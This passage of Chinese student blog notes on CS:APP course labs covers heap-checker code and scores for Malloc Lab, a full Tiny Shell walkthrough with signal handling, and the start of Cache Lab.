    // 检查是否对齐堆顶
    if (!CHECK_ALIGN(bp)) {
        dbg_printf("[%d]Alignment Error: heap top not aligned at %p\n", lineno, bp);
    }
}

注意,你需要手动的调用 mm_checkheap 来检查堆的正确性。调用前你需要在文件开头定义 #define DEBUG 的宏,以开启调试模式。

具体的调试方法请详见上文中的 “测试分” 一节。

检查空闲链表的正确性 mm_checkfreelist(lineno)

/*
 * mm_checkfreelist: 检查空闲链表的正确性
 */
void mm_checkfreelist(int lineno) {
    // 初始化对比变量
    size_t free_block_by_list = 0;
    size_t free_block_by_heap = 0;
    // 检查所有链表链接的正确性
    for (int i = 0;i < FREE_LIST_NUM;i++) {
        char* bp = free_lists[i];
        // 设置全局变量 low_range high_range 对应当前桶的大小范围
        get_range(i);
        while ((void*)bp > mem_heap_lo() && (void*)bp < mem_heap_hi()) {
            // 检查双向链表是否匹配
            if (PREV_NODE(bp) != NULL) {
                if (NEXT_NODE(PREV_NODE(bp)) != bp) {
                    dbg_printf("[%d]Free List Error: prev and next pointer not match at %p\n", lineno, bp);
                }
            }
            // 检查当前节点大小是否符合桶大小
            size_t cur_size = GET_SIZE(HDRP(bp));
            if (cur_size < low_range || cur_size > high_range) {
                dbg_printf("[%d]Free List Error: block size not match bucket at %p\n", lineno, bp);
            }
            // 检查当前节点是否为空闲块
            if (GET_ALLOC(HDRP(bp))) {
                dbg_printf("[%d]Free List Error: block is not free at %p\n", lineno, bp);
            }
            bp = NEXT_NODE(bp);
            ++free_block_by_list;
        }
        if ((void*)bp != mem_heap_lo()) {
            dbg_printf("[%d]Free List Error: pointer out of range at %p\n", lineno, bp);
        }
    }
    char* bp = mem_heap_lo() + DSIZE * FREE_LIST_NUM;
    while ((void*)bp < mem_heap_hi()) {
        if (!GET_ALLOC(HDRP(bp))) {
            ++free_block_by_heap;
        }
        bp = NEXT_BLKP(bp);
    }
    // 检查对比变量是否匹配,从而确定是否所有的空闲块都在空闲链表中
    if (free_block_by_heap != free_block_by_list) {
        dbg_printf("[%d]Free List Error: not all free block in free lists %p\n", lineno, bp);
    }
}

同上。

测试结果与评分

Results for mm malloc:
  valid  util   ops    secs     Kops  trace
   yes    86%  100000  0.006152 16254 ./traces/alaska.rep
 * yes    99%    4805  0.000625  7688 ./traces/amptjp.rep
 * yes    83%    4162  0.000219 18964 ./traces/bash.rep
 * yes    77%   57716  0.001926 29966 ./traces/boat.rep
 * yes    78%  100000  0.003407 29349 ./traces/boat-plus.rep
 u yes    90%      --        --    -- ./traces/binary2-bal.rep
 * yes    99%    5032  0.000553  9105 ./traces/cccp.rep
 * yes    99%    5848  0.000595  9826 ./traces/cccp-bal.rep
 * yes    76%   11991  0.000588 20387 ./traces/chrome.rep
 * yes    99%   20000  0.000705 28363 ./traces/coalesce-big.rep
   yes    66%   14400  0.000351 40982 ./traces/coalescing-bal.rep
   yes   100%      15  0.000012  1228 ./traces/corners.rep
 * yes    99%    5683  0.000926  6138 ./traces/cp-decl.rep
 u yes    71%      --        --    -- ./traces/exhaust.rep
 * yes   100%    5380  0.000934  5758 ./traces/expr-bal.rep
 * yes    84%   99544  0.004843 20554 ./traces/firefox-reddit2.rep
 * yes    98%   55092  0.002232 24684 ./traces/freeciv.rep
   yes    33%      10  0.000011   899 ./traces/malloc.rep
   yes    27%      17  0.000011  1520 ./traces/malloc-free.rep
 p yes     --    1494  0.000100 14947 ./traces/perl.rep
 * yes    93%    4800  0.001033  4648 ./traces/random.rep
 * yes    92%    4800  0.001032  4651 ./traces/random2.rep
   yes    30%   14401  0.092237   156 ./traces/realloc.rep
16 15     90%  386347  0.019719 19593

Perf index = 60 (util) & 40 (thru) = 100/100

如果你没满分,那么你可以参照这个数据来确定你的哪个测试点应当调整。当然,各年的数据可能存在差异,所以仅供参考。

实际 autolab 评测的 KOPS 可能会和本地评测不一致,如我的 autolab 实际评测为 15218 KOPS,但本地评测为 19593 KOPS。这可能和本地 /autolab 的机器性能有关。

如果你实在闲得无聊想卷 KOPS,一个可能的方法是减少所有的变量赋值,而全部转为宏定义或者行内比较,这样可以减少一定的指令数,从而提高吞吐量。

Debug

以下内容来自树洞,我没太用到,仅供参考:

#5740684 2023-12-11 10:59 关注数:6 回复数:2

ICS malloclab 求问如何高效 debug 呀?mm_checkup 函数是要怎么用啊... 一整个周末都是直接第一个 trace 就 segementation fault,真的不知道如何借助其他工具 debug

[Alice]

去掉 -O3 用 gdb 运行 mdriver 可以定位到段错误函数

heapchecker 可以遍历你的空闲链表查看你维护的信息对不对

读 mdriver.c 并改写来提供更多错误信息

先用 ls -l 找小的 trace 来测试

注:这里指的 去掉 -O3,应该是指在 Makefile 中将 CFLAGS 中的 -O3 去掉(或换成 -O2),以降低优化等级,从而方便调试。

参考链接

💾

更适合北大宝宝体质的 Tsh Lab 踩坑记

2023年12月7日 00:24

[!CAUTION]

致各位同学:本笔记的撰写目的是用作参考,请勿直接抄袭,否则后果自负。

我的推荐做法是,你可以阅读我的博文后了解都有哪些坑,但自己实现的时候千万不要看我的代码,避免抄袭风险。

因医学牲期中季完全重叠此 Lab 的时间,导致我最后是赶着 Grace Day 的 ddl 完成的 Lab,所以此文并不同以前一样是边做边写,而是在 Lab 完成提交后,回忆整理的,所以可能会有一些细节遗漏。

本 Lab 的主要目的是实现一个 Tiny Shell (Tsh),即一个可以执行简单命令的 Shell,支持 I/O 重定向、前后台调度执行等功能。

具体来讲,我们需要在 tsh.c 中完成如下部分:

  • sigchld_handler:处理子进程发出的 SIGCHLD 信号。
  • sigint_handler:处理 Ctrl-C 发出的 SIGINT (中断)信号。
  • sigstp_handler:处理 Ctrl-Z 发出的 SIGTSTP (挂起)信号。
  • eval:解析并执行命令。

注意,我将 handler 写在了 eval 前面,这是因为从第二个 trace 开始,都会涉及到 handler 的调用,所以如果你先写完 eval,发现跑不起来,或许就可能是因为你的 handler 没有写好。

然而不幸的是,我就踩了这个坑,按照 writeup 的顺序,首先实现了 eval,再实现了 handler,所以本文的阐述顺序也是按照这个顺序的。

做本 lab 前,我推荐大家先阅读:CSAPP 8.4.6。

写在前面的小技巧

VS Code 报错:未定义标识符 "sigset_t"

cmd+shift+p 按出命令面板,搜索 C/C++ 编辑配置(json),然后把 cStandard 改为 gnu11 即可。

{
  "configurations": [
    {
      "name": "Linux",
      "includePath": ["${workspaceFolder}/**"],
      "defines": [],
      "compilerPath": "/usr/bin/gcc",
      "cStandard": "gnu11",
      "intelliSenseMode": "linux-gcc-x64"
    }
  ],
  "version": 4
}

写错代码,tsh 跑起来断不掉了

使用 cmd+\ 或者按钮新开一个终端,输入:

ps -ef | grep tsh && pkill -f tsh

这段命令前两个可以帮你列出是否有 tsh 进程,最后一个可以帮你杀掉所有 tsh 进程。

注意:

ubuntu   3521853 3472016  0 17:07 pts/3    00:00:00 grep --color=auto --exclude-dir=.bzr --exclude-dir=CVS --exclude-dir=.git --exclude-dir=.hg --exclude-dir=.svn --exclude-dir=.idea --exclude-dir=.tox tsh

这种的是因为你用 ps 去查找 tsh 进程所以会出现的,不用管它。

tsh.c

在正式编写我们的代码之前,我们需要先了解一下 tsh.c 中的一些数据结构和函数。

作业(job)

struct job_t {              /* The job struct */
    pid_t pid;              /* job PID */
    int jid;                /* job ID [1, 2, ...] */
    int state;              /* UNDEF, BG, FG, or ST */
    char cmdline[MAXLINE];  /* command line */
};

首先,我们回忆一下,什么是 job?

在书上,job(作业)是对一条命令行求值而创建的进程的集合,比如:

ls | grep tsh

这条命令行会创建两个进程,一个是 ls,一个是 grep,两者合起来称为一个 job。

按照这个理解,这个结构体实际写的有问题:一个 job 不应该只有一个 pid,而应该是一个 pid 的集合,因为一个 job 可能会创建多个进程。

实际上,这是因为我们的 tsh 只需要支持单进程的命令(即不用支持管道符 |),所以这个结构体的设计上做了简化。

所以,在我们的 tsh 内,可以认为一个 job 唯一地对应一个 process(进程)。

请务必注意这一点,因为这在我们编写 sigint_handlersigstp_handler 的时候会有用。

state 字段表示 job 的状态,包括:

  • UNDEF:未定义
  • BG:后台运行
  • FG:前台运行
  • ST:挂起,即 Ctrl-Z(发送 SIGINT)之后的状态

所有的 job 都会被存储在一个全局变量 job_list 中,这是一个数组,其中每个元素都是一个 job_t 结构体。

命令行参数(cmdline_tokens)

struct cmdline_tokens {
    int argc;               /* Number of arguments */
    char* argv[MAXARGS];    /* The arguments list */
    char* infile;           /* The input file */
    char* outfile;          /* The output file */
    enum builtins_t {       /* Indicates if argv[0] is a builtin command */
        BUILTIN_NONE,
        BUILTIN_QUIT,
        BUILTIN_JOBS,
        BUILTIN_BG,
        BUILTIN_FG,
        BUILTIN_KILL,
        BUILTIN_NOHUP
    } builtins;
};

这个结构体用于存储一行 / 条指令的命令行参数,其中:

  • argc:参数个数
  • argv:参数列表,每个元素都是一个字符串(字符数组首元素指针),其中 argv[0] 是命令名,后面的是参数
  • infile:输入重定向文件名
  • outfile:输出重定向文件名
  • builtins:内建命令,包括:
    • BUILTIN_NONE:无内建命令,通常是外部命令
    • BUILTIN_QUIT:退出
    • BUILTIN_JOBS:列出所有 job
    • BUILTIN_BG:将 job 转为后台运行
    • BUILTIN_FG:将 job 转为前台运行
    • BUILTIN_KILL:杀死 job
    • BUILTIN_NOHUP:忽略 SIGHUP 信号,启动一个新的进程。

从一行命令(字符数组)中解析出这整个结构体的过程,并不需要我们自己实现,而是使用了一个叫做 parseline 的函数,这个函数在 eval 的开头就已经给出了默认调用了,不需要我们手动实现。

值得一提的是,nohup 这个指令实际上在 Linux 系统中很常用到,试想你正在通过 ssh 连接到一台远程服务器上,然后你在服务器上运行了一个程序,但是你突然因为某些原因关掉了 ssh 连接(比如在图书馆自习完了得回宿舍了),这时候你就可以使用 nohup 指令,这样你就可以安全地关闭 ssh 连接,而不会影响到你在服务器上运行的程序(比如某个要爬一个小时的爬虫,没错,说的就是你, PKU News 北大热榜)。

包装函数(wrapper functions)

书上提到,为了实现在遇到错误时打印信息,我们可以自行实现一些包装函数,这些函数会在发生错误时打印错误信息,然后终止程序。通用格式如下:

pid_t Fork(void) {
    pid_t pid;
    if ((pid = fork()) < 0)
        unix_error("Fork error");
    return pid;
}

其中,Fork 称为包装函数,它是对 fork 的包装。他的函数签名(参数和返回值)和 fork 完全一致,只是在内部多了一些错误处理的代码。

注意,如果你在 eval 中调用了任何一个包装函数,你都需要将之定义在 eval 的前面(实现可以放在后面),否则你的代码可能会无法编译。

下文中,我可能会不加区分地混用 “包装函数” 和 “函数”,忽略即可。

其他辅助函数

tsh 中还提供了一些其他的函数,往往根据函数名就可以知道其功能,这里就不再赘述了。可以在 tsh.c 中的开头顺序查看。

eval

eval 是我们的核心函数,它的作用是解析并执行命令。

void
eval(char* cmdline) {
    int bg; /* should the job run in bg or fg? */
    struct cmdline_tokens tok;

    /* Parse command line */
    bg = parseline(cmdline, &tok);

    if (bg == -1) /* parsing error */
        return;
    if (tok.argv[0] == NULL) /* ignore empty lines */
        return;

    // 这里是我们需要实现的部分
    return;
}

查看 eval 的源码,我们可以发现,它已经调用了 parseline 函数,将命令行解析成了 cmdline_tokens 结构体,存储在了 tok 这个局部变量中,并将其返回值(代表是否后台运行)存储在了 bg 中。

我们需要做的,就是在这个函数中,根据 tok 中的信息,执行命令。

根据 writeup,我们需要实现的功能有:

  • 内建命令
  • 外部命令
  • I/O 重定向
  • 前后台调度

思考一下,我们首先应该做什么?显然把 I/O 重定向放在具体执行命令之前是更合适的,这样我们就不必在执行命令的时候额外为之编写代码。同时,你也可能想到了,我们在编写 eval 的时候,很可能会调用一些我们在其之外定义的函数,如果我们不首先执行 I/O 重定向,那么我们或许在调用这些函数的时候都会需要传入 tok,并在函数内部进行判断,这样显然是十分麻烦的。

所以,我们首先应该做的,就是执行 I/O 重定向。

I/O 重定向

I/O 重定向的实现,其实就是将 stdinstdout 重定向到指定的文件中。

这部分内容实际上在 CS:APP 第十章系统级 I/O 中,但因为我复习医学部期中落后了很多正课进度,所以我在写这个 Lab 的时候,还没有学到这一章,所以我的后续内容可能会有一些错误,欢迎指正。

什么是 stdinstdout?这两个都是文件描述符(file_descripter),分别对应标准输入(0)和标准输出(1)。

GPT-4-Turbo:文件描述符是一个用于访问文件的抽象指标。在操作系统中,当程序打开一个现有文件或者创建一个新文件时,操作系统会提供一个文件描述符,它通常是一个非负整数。文件描述符用于标识被打开文件的控制信息,使得程序可以进行如读取、写入和关闭等操作。

我们可以通过 dupdup2 函数来实现重定向:

  • int dup(int fd):复制文件描述符,返回一个新的文件描述符,指向与原文件描述符相同的文件。
  • int dup2(int fd1, int fd2):将文件描述符 fd1 复制到 fd2,如果 fd2 已经打开,则先将其关闭。即将 fd2 改为指向 fd1 所指向的文件。返回值为 fd2。

我们可以通过 open 函数来打开文件,然后通过 dup2 函数将 stdinstdout 重定向到这个文件中。

// unistd.h
#define	 STDIN_FILENO	0	/* standard input file descriptor */
#define	STDOUT_FILENO	1	/* standard output file descriptor */
// tsh.c
int fd = open("file.txt", O_RDONLY,0); // 打开文件
dup2(fd, STDIN_FILENO); // 将 stdin 重定向到 file.txt

open 函数的签名为 int open(const char *pathname, int flags, mode_t mode),其中:

  • pathname:文件路径
  • flags:打开方式,包括:
    • O_RDONLY:只读
    • O_WRONLY:只写
    • O_RDWR:读写
    • O_CREAT:如果文件不存在则创建
    • O_TRUNC:如果文件存在则清空
    • O_APPEND:追加
  • mode:文件权限。当 flags 中包含 O_CREAT 时,需要指定文件权限。

在 tshlab 中,我们实际上只涉及到了 O_RDONLYO_WRONLY,也就不需要指定 mode

所以我们得到了一个简单的 I/O 重定向的实现:

// tsh.c
// 输入输出文件
int input_file = STDIN_FILENO;
int output_file = STDOUT_FILENO;

if (tok.infile) {
    input_file = Open(tok.infile, O_RDONLY, 0);
}
if (tok.outfile) {
    output_file = Open(tok.outfile, O_WRONLY, 0);
}

// 备份以供恢复
int std_input = Dup(STDIN_FILENO);
int std_output = Dup(STDOUT_FILENO);
// 重定向输入输出
Dup2(input_file, STDIN_FILENO);
Dup2(output_file, STDOUT_FILENO);

// 执行命令
// ...

// 恢复输入输出
Dup2(std_input, STDIN_FILENO);
Dup2(std_output, STDOUT_FILENO);

完成了 I/O 重定向,我们就可以开始执行命令了。我们按照 token 结构体内的枚举类型 builtins 来分类讨论。

外部命令 BUILTIN_NONE

/* tsh.c/eval */
switch (tok.builtins) {
    case BUILTIN_NONE:
        eval_none(tok, bg, cmdline);
        break;
}

eval_none 函数的作用是执行外部命令,即不是内建命令的命令。

/* tsh.c/eval_none */
void eval_none(struct cmdline_tokens tok, int bg, char* cmdline);

为什么需要这三个参数?

  • tok:创建新的子进程并执行时,我们需要解析出的命令行参数,如执行文件地址、参数列表等。显然我们没必要再次解析一遍,所以我们直接将 tok 传入即可。
  • bg:是否后台运行。这会决定是否要等待子进程结束。
  • cmdline:原始命令行,用于添加到 job_list 中。

参照书上的讲解,我们首先得到一个含有许多 bug 的粗略实现:

/* tsh.c/eval_none */
void eval_none(struct cmdline_tokens tok, int bg, char* cmdline) {
    pid_t pid;

    // 子进程
    if ((pid = fork()) == 0) {
        // 执行命令
        setpgid(0, 0);
        if (execve(tok.argv[0], tok.argv, environ) < 0) {
            printf("%s: Command not found.\n", tok.argv[0]);
            exit(0);
        }
    }

    // 父进程
    else {
        addjob(job_list, pid, bg ? BG : FG, cmdline);
        // 前台运行
        if (!bg) {
            int status;
            waitpid(pid, &status, 0);
        }
        // 后台运行
        else {
            printf("[%d] (%d) %s\n", pid2jid(pid), pid, cmdline);
        }
    }

    return;
}

首先说下我们做了什么,我们使用 fork 创建了一个子进程,并通过判断其返回值是否为 0 来判断当前进程是子进程还是父进程。

若是子进程,则使用 execve 执行命令:

int execve(const char *__file, char *const *__argv, char *const *__envp)

执行的参数包括 文件名参数列表环境变量,其中环境变量是外部全局变量 environ,直接传入即可。

若是父进程,则判断子进程是否为前台进程。若是前台进程,则调用 waitpid 等待。若是后台进程,就直接打印相关信息后返回。

这段代码存在许多的问题,接下来我们逐一修复他们。

首先,在父进程添加 job 的时候,存在书上所说的 竞争 的情况,由于父子进程的执行是并发的,所以可能会出现这样的情况:

  • 父进程分叉出子进程
  • 子进程执行,并很快执行完毕,调用 exit 退出
  • 父进程开始执行,调用 addjob 添加 job

此时,父进程添加的 job 实际上是一个已经退出的进程,这显然是不对的。

所以我们需要在分叉出子进程前,使用 sigprocmaskSIGCHLD 信号阻塞,然后在父进程中,当添加完 job 后,再解除阻塞。除此之外,为了保证 job 一定被成功添加,我们至少还需要阻塞 SIGINTSIGTSTP 信号。

经测试,直接阻塞所有信号也是可以的。

而在后续的过程中:

  • 对于子进程,我们需要首先解除阻塞,然后再执行命令。
  • 对于父进程,我们要在调用 addjob 添加完 job 后,再解除阻塞。

于是我们得到了一个改进版:

void eval_none(struct cmdline_tokens tok, int bg, char* cmdline) {
    // 至少要阻断以下信号,防止子进程返回或者父进程被挂起,防止竞争:
    // 阻断子进程终止、停止信号 SIGCHLD
    // 阻断键盘终断信号 SIGINT
    // 阻断终端停止信号 SIGTSTP
    // 此处为简便直接阻断所有信号
    sigset_t mask_all, mask_prev;
    Sigfillset(&mask_all);
    Sigprocmask(SIG_BLOCK, &mask_all, &mask_prev);
    pid_t pid;
    // 子进程
    if ((pid = Fork()) == 0) {
        // 创建新进程组
        setpgid(0, 0);
        Sigprocmask(SIG_SETMASK, &mask_prev, NULL);
        if (Execve(tok.argv[0], tok.argv, environ) < 0) {
            printf("%s: Command not found\n", tok.argv[0]);
            exit(0);
        }
    }
    // 父进程
    else {
        // 因为要修改全局数据结构,所以先阻断所有的信号后,再使用 addjob,然后再重置 mask
        addjob(job_list, pid, bg ? BG : FG, cmdline);
        Sigprocmask(SIG_SETMASK, &mask_prev, NULL);
        // 前台进程
        if (!bg) {
            int status;
            waitpid(pid, &status, 0);
        }
        // 后台进程
        else {
            printf("[%d] (%d) %s\n", pid2jid(pid), pid, cmdline);
        }
    }
};

然而,对于这个函数,在父进程等待一个前台子进程时,还是存在一个严重的问题:由于 waitpid 是一个阻塞函数,所以父进程会一直等待,直到子进程结束。所以,如果父进程在此时接受到了一个其他信号(如 SIGINT),那么就可能造成永久阻塞。

所以正确的做法是,我们需要在父进程中,使用 sigsuspend 函数来挂起父进程,直到子进程结束。

有关此处更进一步的讨论,可以参照 CSAPP 8.5.7 的内容。

同时,我们不能使用 if 进行判断,而是要使用 while 循环,因为如果使用 if 的话,可能会因为被挂起,而导致 sigsuspend 跳出。所以必须使用 while 一直判断子进程是否为前台进程。

while (pid == fgpid(job_list)) {
    sigsuspend(&mask_prev);
}

这样,我们就可以得到一个完整的 eval_none 函数了:

void eval_none(struct cmdline_tokens tok, int bg, char* cmdline) {
    // 至少要阻断以下信号,防止子进程返回或者父进程被挂起,防止竞争:
    // 阻断子进程终止、停止信号 SIGCHLD
    // 阻断键盘终断信号 SIGINT
    // 阻断终端停止信号 SIGTSTP
    // 此处为简便直接阻断所有信号
    sigset_t mask_all, mask_prev;
    Sigfillset(&mask_all);
    Sigprocmask(SIG_BLOCK, &mask_all, &mask_prev);
    pid_t pid;
    // 子进程
    if ((pid = Fork()) == 0) {
        // 创建新进程组
        setpgid(0, 0);
        Sigprocmask(SIG_SETMASK, &mask_prev, NULL);
        if (Execve(tok.argv[0], tok.argv, environ) < 0) {
            printf("%s: Command not found\n", tok.argv[0]);
            exit(0);
        }
    }
    // 父进程
    else {
        // 因为要修改全局数据结构,所以先阻断所有的信号后,再使用 addjob,然后再重置 mask
        addjob(job_list, pid, bg ? BG : FG, cmdline);
        Sigprocmask(SIG_SETMASK, &mask_prev, NULL);
        // 前台进程
        if (!bg) {
            // 用 while 循环等待前台进程结束,不能用 if
            // 因为如果用 if 的话,可能会因为被挂起,而导致跳过。必须一直判断子进程是否为前台进程
            // 也不能用 waitpid,因为 waitpid 会存在类似因为其他信号而永久阻塞的问题
            while (pid == fgpid(job_list)) {
                sigsuspend(&mask_prev);
            }
        }
        // 后台进程
        else {
            printf("[%d] (%d) %s\n", pid2jid(pid), pid, cmdline);
        }
    }
};

从而,我们就完成了对于外部命令的执行。

退出 QUIT

/* tsh.c/eval */
switch (tok.builtins) {
    case BUILTIN_QUIT:
        exit(0);
}

exit 函数的作用是退出当前进程,其签名为 void exit(int status),其中 status 为进程的退出状态,通常为 0。

此处直接退出即可,连 break 都不需要。

列出所有作业 JOBS

/* tsh.c/eval */
switch (tok.builtins) {
    case BUILTIN_JOBS:
        listjobs(job_list, output_file);
        break;
}

调用默认函数直接秒了,有什么好说的(逃)。

转为后台运行 BG

/* tsh.c/eval */
switch (tok.builtins) {
    case BUILTIN_BG:
        eval_bg(tok);
        break;
}

eval_bg 函数的作用是将 job 转为后台运行。

/* tsh.c/eval_bg */
void eval_bg(struct cmdline_tokens tok) {
    struct job_t* job;
    int jid;
    pid_t pid;
    // 通过jid找到job
    if (tok.argv[1][0] == '%') {
        jid = atoi(tok.argv[1] + 1);
        job = getjobjid(job_list, jid);
    }
    // 通过pid找到job
    else {
        pid = atoi(tok.argv[1]);
        job = getjobpid(job_list, pid);
    }
    pid = job->pid;
    Kill(pid, SIGCONT);
    job->state = BG;
    printf("[%d] (%d) %s\n", job->jid, job->pid, job->cmdline);
}

也没啥好说的,直接通过给定的 jid 或 pid 找到 job,然后发送 SIGCONT 信号即可。

注意我们之前说过,我们的 tsh 只支持单进程命令。所以不存在一个 job 有多个进程的情况,所以我们可以直接通过 job->pid 来找到进程。

由于我们的 job 是一个指向 job_t 的指针,所以我们需要使用 -> 来访问其成员,而不能使用 .

转为前台运行 FG

/* tsh.c/eval */
switch (tok.builtins) {
    case BUILTIN_FG:
        eval_fg(tok);
        break;
}

eval_fg 函数的作用是将 job 转为前台运行。

/* tsh.c/eval_fg */
void eval_fg(struct cmdline_tokens tok) {
    struct job_t* job;
    int jid;
    pid_t pid;
    // 通过jid找到job
    if (tok.argv[1][0] == '%') {
        jid = atoi(tok.argv[1] + 1);
        job = getjobjid(job_list, jid);
    }
    // 通过pid找到job
    else {
        pid = atoi(tok.argv[1]);
        job = getjobpid(job_list, pid);
    }
    pid = job->pid;
    Kill(pid, SIGCONT);
    job->state = FG;
    // 等待前台进程结束
    sigset_t mask_none;
    Sigemptyset(&mask_none);
    // 同先前,只能用 while
    while (pid == fgpid(job_list)) {
        sigsuspend(&mask_none);
    }
}

也没啥好说的,仿照 eval_bg ,结合之前的 eval_none 中提到的等待前台进程结束的方法即可。

杀死进程 KILL

/* tsh.c/eval */
switch (tok.builtins) {
    case BUILTIN_KILL:
        eval_kill(tok);
        break;
}

eval_kill 函数的作用是根据 pid 或者 jid 杀死 job。

void eval_kill(struct cmdline_tokens tok) {
    struct job_t* job;
    int jid;
    pid_t pid;
    // 通过jid找到job
    if (tok.argv[1][0] == '%') {
        jid = atoi(tok.argv[1] + 1);
        // 后续不再考虑是否是正负,直接取绝对值
        jid = jid > 0 ? jid : -jid;
        job = getjobjid(job_list, jid);
        if (job == NULL) {
            printf("%%%d: No such job\n", jid);
            return;
        }
    }
    // 通过pid找到job
    else {
        pid = atoi(tok.argv[1]);
        // 后续不再考虑是否是正负,直接取绝对值
        pid = pid > 0 ? pid : -pid;
        job = getjobpid(job_list, pid);
        // pid 必有 job,不需要判断是否不存在
    }
    pid = job->pid;
    Kill(pid, SIGTERM);
}

还是仿照先前的方法,拿到 job,因为一个 job 只有一个 processs,所以无所谓正负号其实,直接全改为正数就完了。

所以拿到 job 后,直接再反向找到 pid,然后发送 SIGTERM 信号即可。

需要注意的是,其中对于 job 不存在的情况是有检查的,所以我们需要进行额外的一行格式化打印,由于每个 pid 都一定有对应的 job,所以不需要检查 pid 不存在的情况。

忽略 SIGHUP 信号,启动一个新的进程 NOHUP

/* tsh.c/eval */
switch (tok.builtins) {
    case BUILTIN_NOHUP:
        sigset_t mask_hup, mask_prev;
        // 阻塞 SIGHUP 信号
        Sigemptyset(&mask_hup);
        Sigaddset(&mask_hup, SIGHUP);
        Sigprocmask(SIG_BLOCK, &mask_hup, &mask_prev);
        // 执行命令,但是移除"nohup "前缀
        eval(cmdline + 6);
        // 解除阻塞
        Sigprocmask(SIG_SETMASK, &mask_prev, NULL);
        break;
}

这一步就不用额外抽离函数了,直接在 eval 中完成一个对于 SIGHUP 信号的阻塞,然后 “递归调用”,执行命令即可。

SUMMARY 总结

综上,我们就完成了对于 eval 的实现,最终的代码如下:

/* tsh.c/eval */
void eval(char* cmdline) {
    int bg; /* should the job run in bg or fg? */
    struct cmdline_tokens tok;

    /* Parse command line */
    bg = parseline(cmdline, &tok);

    if (bg == -1) /* parsing error */
        return;
    if (tok.argv[0] == NULL) /* ignore empty lines */
        return;

    // 输入输出文件
    int input_file = STDIN_FILENO;
    int output_file = STDOUT_FILENO;

    if (tok.infile) {
        input_file = Open(tok.infile, O_RDONLY, 0);
    }
    if (tok.outfile) {
        output_file = Open(tok.outfile, O_WRONLY, 0);
    }

    // 备份以供恢复
    int std_input = Dup(STDIN_FILENO);
    int std_output = Dup(STDOUT_FILENO);
    // 重定向输入输出
    Dup2(input_file, STDIN_FILENO);
    Dup2(output_file, STDOUT_FILENO);

    switch (tok.builtins) {

    case BUILTIN_NONE:
        eval_none(tok, bg, cmdline);
        break;

    case BUILTIN_QUIT:
        exit(0);

    case BUILTIN_JOBS:
        listjobs(job_list, output_file);
        break;

    case BUILTIN_BG:
        eval_bg(tok);
        break;

    case BUILTIN_FG:
        eval_fg(tok);
        break;

    case BUILTIN_KILL:
        eval_kill(tok);
        break;

    case BUILTIN_NOHUP:
        sigset_t mask_hup, mask_prev;
        // 阻塞 SIGHUP 信号
        Sigemptyset(&mask_hup);
        Sigaddset(&mask_hup, SIGHUP);
        Sigprocmask(SIG_BLOCK, &mask_hup, &mask_prev);
        // 执行命令,但是移除"nohup "前缀
        eval(cmdline + 6);
        // 解除阻塞
        Sigprocmask(SIG_SETMASK, &mask_prev, NULL);
        break;

    default:
        break;
    }

    // 重置输入输出文件,先关闭,再把标准输入输出重定向回去
    if (tok.infile) {
        Close(input_file);
        Dup2(std_input, STDIN_FILENO);
    }
    if (tok.outfile) {
        Close(output_file);
        Dup2(std_output, STDOUT_FILENO);
    }

    return;
}

至于各个调用的函数的实现,请参照前文,此处就不再赘述了。

signal_handlers

sigchld_handler

void sigchld_handler(int sig) {
    // 保存 errno
    int olderrno = errno;
    int status;
    pid_t pid;
    struct job_t* job;
    sigset_t mask_all, mask_prev;

    Sigfillset(&mask_all);

    // 只要有一个子进程返回就执行,不等待全部子进程返回
    while ((pid = waitpid(-1, &status, WNOHANG | WUNTRACED | WCONTINUED)) > 0) {
        job = getjobpid(job_list, pid);

        // 若正常终止,直接删除返回
        if (WIFEXITED(status)) {
            // 阻塞信号,保护全局数据结构
            Sigprocmask(SIG_SETMASK, &mask_all, &mask_prev);
            deletejob(job_list, pid);
            Sigprocmask(SIG_SETMASK, &mask_prev, NULL);
        }
        // 若由信号终止,则打印终止的信号,并删除
        if (WIFSIGNALED(status)) {
            sio_put("Job [%d] (%d) terminated by signal %d\n", job->jid, pid, WTERMSIG(status));
            Sigprocmask(SIG_SETMASK, &mask_all, &mask_prev);
            deletejob(job_list, pid);
            Sigprocmask(SIG_SETMASK, &mask_prev, NULL);
        }
        // 若由信号停止,则更新信号状态即可
        if (WIFSTOPPED(status)) {
            sio_put("Job [%d] (%d) stopped by signal %d\n", job->jid, pid, WSTOPSIG(status));
            Sigprocmask(SIG_SETMASK, &mask_all, &mask_prev);
            job->state = ST;
            Sigprocmask(SIG_SETMASK, &mask_prev, NULL);
        }
        // 若由信号继续,且当前进程为停止状态,则恢复,且改为后台运行
        if (WIFCONTINUED(status) && job->state == ST) {
            Sigprocmask(SIG_SETMASK, &mask_all, &mask_prev);
            job->state = BG;
            Sigprocmask(SIG_SETMASK, &mask_prev, NULL);
        }
    }

    // 若没有子进程返回,且 errno 不是 ECHILD(代表没有子进程了),也即非正常退出,则报错
    if (pid < 0 && errno != ECHILD)
        unix_error("waitpid error");

    // 恢复 errno
    errno = olderrno;

    return;
}

这部分主要是要注意,在 handler 内我们必须使用异步信号安全的函数,所以我们不能使用 printf,而是要使用 sio_put

同时,按照书上所讲,如果我们在 handler 内部修改了全局数据结构,那么我们必须需要在修改前后,使用 sigprocmask 来阻塞所有信号,以保证数据结构的完整性。

关于为何要恢复 errno,请参照书上 8.3 章(P512)。

sigint_handler

void sigint_handler(int sig) {
    // 保存 errno
    int olderrno = errno;
    pid_t pid = fgpid(job_list);
    if (pid) {
        Kill(pid, SIGINT);
    }
    // 恢复 errno
    errno = olderrno;
    return;
}

这部分比较简单,直接获取当前前台进程的 pid,然后发送 SIGINT 信号即可。

sigtstp_handler

void sigtstp_handler(int sig) {
    // 保存 errno
    int olderrno = errno;
    pid_t pid = fgpid(job_list);
    if (pid) {
        Kill(pid, SIGTSTP);
    }
    // 恢复 errno
    errno = olderrno;
    return;
}

同上文。

💾

更适合北大宝宝体质的 Cache Lab 踩坑记

2023年11月3日 22:22

[!CAUTION]

致各位同学:本笔记的撰写目的是用作参考,请勿直接抄袭,否则后果自负。

我的推荐做法是,你可以阅读我的博文后了解都有哪些坑,但自己实现的时候千万不要看我的代码,避免抄袭风险。

PartA

需要编写一个 csim.c 程序,来模拟缓存机制。

测试指令

make && ./test-csim

出现 TEST_CSIM_RESULTS=27 字样即代表成功。

编写细节

感觉没什么好说的,主要是从汇编回到 C 有点陌生了,注意参数读、文件读和内存分配管理的方法就行。

具体的文件读写,系统 I/O 的知识在第十章才会讲到,这里涉及到的 FILE* 流的知识则是在 10.10 节,所以如果你现在不会的话你可以选择提前预习第十章(挺短的),或者只是先简单了解一下所需函数的使用方法。

文件读写

#include <stdlib.h>

FILE* trace_file; // 定义文件指针
trace_file = fopen(optarg, "r"); // 打开文件
